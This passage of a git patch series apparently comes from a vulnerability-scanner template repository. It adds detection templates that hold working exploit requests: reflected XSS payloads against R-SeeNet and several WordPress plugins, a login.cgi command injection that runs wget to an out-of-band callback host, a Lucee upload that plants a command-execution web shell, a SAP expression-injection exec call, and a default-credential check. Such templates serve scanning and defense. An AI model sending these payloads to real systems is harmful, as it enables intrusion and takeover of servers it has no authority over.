exposed-panels/cortex-xsoar-login.yaml diff --git a/exposed-panels/cortex-xsoar-login.yaml b/exposed-panels/cortex-xsoar-login.yaml new file mode 100644 index 0000000000..8f827c4fab --- /dev/null +++ b/exposed-panels/cortex-xsoar-login.yaml @@ -0,0 +1,23 @@ +id: cortex-xsoar-login + +info: + name: Cortex XSOAR Login Panel + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Cortex+XSOAR%22 + tags: panel,soar + +requests: + - method: GET + path: + - '{{BaseURL}}/#/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cortex XSOAR' + + - type: status + status: + - 200 From 4414ff60db452012a5249e17f9d3f77eb3d7731c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 18 Jul 2021 22:12:01 +0900 Subject: [PATCH 0800/4083] Create Advantech R-SeeNet Multiple Reflected XSS vulnerabilities This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-21801.yaml | 30 ++++++++++++++++++++++++++++++ cves/2021/CVE-2021-21802.yaml | 30 ++++++++++++++++++++++++++++++ cves/2021/CVE-2021-21803.yaml | 30 ++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+) create mode 100644 cves/2021/CVE-2021-21801.yaml create mode 100644 cves/2021/CVE-2021-21802.yaml create mode 100644 cves/2021/CVE-2021-21803.yaml diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml new file mode 100644 index 0000000000..86535154c2 --- /dev/null +++ b/cves/2021/CVE-2021-21801.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-21801 + +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml new file mode 100644 index 0000000000..0c2ec6e050 --- /dev/null +++ b/cves/2021/CVE-2021-21802.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-21802 + +info: + name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml new file mode 100644 index 0000000000..6b2a571f40 --- /dev/null +++ b/cves/2021/CVE-2021-21803.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-21803 + +info: + name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 19fa522fecf866f7c5649835a9789e773174581d Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 18 Jul 2021 22:44:29 +0900 Subject: [PATCH 0801/4083] Create mirai-unknown-rce.yaml The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/mirai-unknown-rce.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/mirai-unknown-rce.yaml diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml new file mode 100644 index 0000000000..544345566f --- /dev/null +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -0,0 +1,26 @@ +id: mirai-unknown-rce + +info: + name: Mirai Unknown - Remote Code Execution + author: gy741 + severity: critical + description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. + reference: | + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: mirai,rce,oob + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + + key=';`wget http://{{interactsh-url}}`;# + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 0a8d2ffdccf34d673ea114763dbbdb2a7a44d581 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Jul 2021 19:19:19 +0530 Subject: [PATCH 0802/4083] Create CVE-2021-21307.yaml --- cves/2021/CVE-2021-21307.yaml | 76 +++++++++++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 cves/2021/CVE-2021-21307.yaml diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml new file mode 100644 index 0000000000..c5a83f5d45 --- /dev/null +++ b/cves/2021/CVE-2021-21307.yaml @@ -0,0 +1,76 @@ +id: CVE-2021-21307 + +info: + name: Adobe Lucee RCE + author: dhiyaneshDk + severity: high + reference: https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md + tags: lucee,adobe,cve2021,rce + +requests: + - raw: + - | + POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 8 + + imgSrc=a + - | + POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Content-Length: 790 + + imgSrc= + + + + + + + +
    Command:value="#form.cmd#">
    Options: value="#form.opts#">
    Timeout: value="#form.timeout#" + value="5">
    + + + + + + + +
    +        #HTMLCodeFormat(myVar)#
    +        
    +
    +
    + - | + POST /lucee/{{randstr}}.cfm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + cmd=id&opts=&timeout=5 + + matchers-condition: and + matchers: + - type: regex + regex: + - "uid=" From c0ae7b8edae92309cb112b16d0364b4df9de05c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Jul 2021 19:21:01 +0530 Subject: [PATCH 0803/4083] Update lucee-workflow.yaml --- workflows/lucee-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 68772415a5..51ad90f94b 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -2,7 +2,7 @@ id: lucee-workflow info: name: Lucee Detection Workflow - author: geeknik + author: geeknik,dhiyaneshDk description: A simple workflow that runs all Lucee related nuclei templates on given target. tags: workflow @@ -12,3 +12,4 @@ workflows: - template: technologies/default-lucee-page.yaml - template: exposed-panels/lucee-login.yaml - template: exposures/logs/lucee-stack-trace.yaml + - template: cve/2021/CVE-2021-21307.yaml From e692d81999c3a0ca13fb932099afd44eb4e10c35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Jul 2021 19:24:46 +0530 Subject: [PATCH 0804/4083] Update CVE-2021-21307.yaml --- cves/2021/CVE-2021-21307.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index c5a83f5d45..76df8daeb8 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -33,7 +33,7 @@ requests: imgSrc= - + From 9971674b361a37f4f4fa500d29e709a09915a22d Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 18 Jul 2021 22:54:34 +0530 Subject: [PATCH 0813/4083] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index bdfb72a5a7..e6fc7a8ee6 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -14,6 +14,7 @@ requests: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" + matchers-condition: and matchers: - type: word From c56680cef31536b4e4e843b2c71c4e24202b3ba2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 23:14:19 +0530 Subject: [PATCH 0814/4083] Additional matcher --- cves/2021/CVE-2021-21801.yaml | 2 ++ cves/2021/CVE-2021-21802.yaml | 2 ++ cves/2021/CVE-2021-21803.yaml | 2 ++ 3 files changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 86535154c2..338eccbd88 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - '"zlo onerror=alert(1) "' + - 'Device Status Graph' part: body + condition: and - type: word part: header diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml index 0c2ec6e050..a3eeb5f61e 100644 --- a/cves/2021/CVE-2021-21802.yaml +++ b/cves/2021/CVE-2021-21802.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - '"zlo onerror=alert(1) "' + - 'Device Status Graph' part: body + condition: and - type: word part: header diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml index 6b2a571f40..93a8fcf35e 100644 --- a/cves/2021/CVE-2021-21803.yaml +++ b/cves/2021/CVE-2021-21803.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - '"zlo onerror=alert(1) "' + - 'Device Status Graph' part: body + condition: and - type: word part: header From e975b6edac14ca168870493ba03e5fb72726e3d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 17:48:01 +0000 Subject: [PATCH 0815/4083] Auto Update README [Sun Jul 18 17:48:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 44b521a302..e757b0e8b7 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 461 | vulnerabilities | 236 | exposed-panels | 201 | +| cves | 464 | vulnerabilities | 236 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1598 files**. +**134 directories, 1601 files**. From 965e6fcc000b114dcb6fb7542a47052ed37b83d1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 23:24:55 +0530 Subject: [PATCH 0816/4083] minor update --- cves/2020/CVE-2020-27866.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index 118e42e46e..78a7cfb467 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -19,7 +19,6 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close matchers-condition: and @@ -30,5 +29,5 @@ requests: - type: word words: - - 'Debug Enable' - part: body + - 'Debug Enable!' + part: body \ No newline at end of file From 8d9b19651fd79ba5c4302c5521bec285bb4a9cfd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 17:56:01 +0000 Subject: [PATCH 0817/4083] Auto Update README [Sun Jul 18 17:56:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e757b0e8b7..a3bb0389b1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 464 | vulnerabilities | 236 | exposed-panels | 201 | +| cves | 465 | vulnerabilities | 236 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1601 files**. +**134 directories, 1602 files**. From 0cb3c9d6b5d38514e948074f4c2a6e5621ac3088 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 18:01:12 +0000 Subject: [PATCH 0818/4083] Auto Update README [Sun Jul 18 18:01:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a3bb0389b1..ff039144bf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 465 | vulnerabilities | 236 | exposed-panels | 201 | +| cves | 465 | vulnerabilities | 237 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1602 files**. +**134 directories, 1603 files**. From 8592ef0388bf8451230b63f24de03e5939d546b3 Mon Sep 17 00:00:00 2001 From: pratikkhalane Date: Mon, 19 Jul 2021 01:46:22 +0530 Subject: [PATCH 0819/4083] .\Tieline\Tieline.yaml --- default-logins/Tieline/Tieline.yaml | 40 +++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 default-logins/Tieline/Tieline.yaml diff --git a/default-logins/Tieline/Tieline.yaml b/default-logins/Tieline/Tieline.yaml new file mode 100644 index 0000000000..e774acdba7 --- /dev/null +++ b/default-logins/Tieline/Tieline.yaml @@ -0,0 +1,40 @@ +id: Tieline-default-credentials + +info: + name: Tieline Default Credentials Detection Template + author: Pratik Khalane + severity: high + description: Finding the Tieline Admin Panels with default credentials. + reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c + tags: Tieline,default-login + +#Payloads: + +#Username - admin +#Password - password + +requests: + - method: GET + path: + - '{{BaseURL}}/api/get_device_details' + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 + Referer: '{{BaseURL}}/assets/base/home.html' + Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"' + + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + condition: and + + - type: word + words: + - "text/xml" + part: header + + - type: status + status: + - 200 \ No newline at end of file From 556a94136b9110129cd95aefe4c427f6cda91a74 Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Mon, 19 Jul 2021 10:40:50 +0530 Subject: [PATCH 0820/4083] Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) --- cves/2021/CVE-2021-24498.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-24498.yaml diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml new file mode 100644 index 0000000000..742f9b8a29 --- /dev/null +++ b/cves/2021/CVE-2021-24498.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24498 + +info: + name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: suman_kar + description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. + severity: medium + tags: cve,cve2021,xss,wordpress + reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + +requests: + - raw: + - | + GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + matchers-condition: and + matchers: + - type: word + words: + - '><' + - 'Calendar Details' + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 77fd227376d020fd688c84b7093c2dc47b5d1bfc Mon Sep 17 00:00:00 2001 From: Suman Kar <43452298+skar4444@users.noreply.github.com> Date: Mon, 19 Jul 2021 10:45:58 +0530 Subject: [PATCH 0821/4083] Update CVE-2021-24498.yaml --- cves/2021/CVE-2021-24498.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index 742f9b8a29..a24a3fd3cb 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -27,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 9292a9a02586c360b47b97a0efa0575f649173d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:55:56 +0530 Subject: [PATCH 0822/4083] Update CVE-2011-4618.yaml --- cves/2011/CVE-2011-4618.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml index e043051810..301cd48ca3 100644 --- a/cves/2011/CVE-2011-4618.yaml +++ b/cves/2011/CVE-2011-4618.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c8776b52be2326aa53a86ac50ce1e81adc7488bc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:56:53 +0530 Subject: [PATCH 0823/4083] Update CVE-2011-4624.yaml --- cves/2011/CVE-2011-4624.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml index 6b6eae3e15..2ae32f0d66 100644 --- a/cves/2011/CVE-2011-4624.yaml +++ b/cves/2011/CVE-2011-4624.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 92e3ef5abb45924dde979448d5df520c550b3a85 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:57:35 +0530 Subject: [PATCH 0824/4083] Update CVE-2011-4926.yaml --- cves/2011/CVE-2011-4926.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml index 17178b7f7d..bbefdb8002 100644 --- a/cves/2011/CVE-2011-4926.yaml +++ b/cves/2011/CVE-2011-4926.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 0ee4a82a5192e8490d5b29a3ac874d897d618497 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:58:12 +0530 Subject: [PATCH 0825/4083] Update CVE-2011-5106.yaml --- cves/2011/CVE-2011-5106.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml index a17da7fc2f..fb203bd625 100644 --- a/cves/2011/CVE-2011-5106.yaml +++ b/cves/2011/CVE-2011-5106.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 88cbfd1c8ae54fd1dad4ac4c5c15949a108941d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:58:42 +0530 Subject: [PATCH 0826/4083] Update CVE-2011-5107.yaml --- cves/2011/CVE-2011-5107.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml index c01e565c70..ef7a3e99a4 100644 --- a/cves/2011/CVE-2011-5107.yaml +++ b/cves/2011/CVE-2011-5107.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c255951814f69c066cd46500fdeb863cd69f4caf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:59:15 +0530 Subject: [PATCH 0827/4083] Update CVE-2011-5179.yaml --- cves/2011/CVE-2011-5179.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml index 9c92b5cf55..fc3dcab6fe 100644 --- a/cves/2011/CVE-2011-5179.yaml +++ b/cves/2011/CVE-2011-5179.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 112172ca7f8c738c5cf7e969165874a12fb0da5b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:59:46 +0530 Subject: [PATCH 0828/4083] Update CVE-2011-5181.yaml --- cves/2011/CVE-2011-5181.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml index 41812c748a..c7e74be15b 100644 --- a/cves/2011/CVE-2011-5181.yaml +++ b/cves/2011/CVE-2011-5181.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 16d049098f46681c8b22c77bc3f52454bf68ede7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:00:15 +0530 Subject: [PATCH 0829/4083] Update CVE-2011-5265.yaml --- cves/2011/CVE-2011-5265.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml index 2ed7592d9e..5412865a18 100644 --- a/cves/2011/CVE-2011-5265.yaml +++ b/cves/2011/CVE-2011-5265.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From b4c91dc3c3f6c01eb8f924e859e5c9e8d715b159 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:00:43 +0530 Subject: [PATCH 0830/4083] Update CVE-2012-0901.yaml --- cves/2012/CVE-2012-0901.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml index fb82bdfed6..728c0ccd73 100644 --- a/cves/2012/CVE-2012-0901.yaml +++ b/cves/2012/CVE-2012-0901.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 41df1d813615e45ae870ecc0ce96462a881795a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:01:12 +0530 Subject: [PATCH 0831/4083] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 25c8832501..9bc5c08991 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - 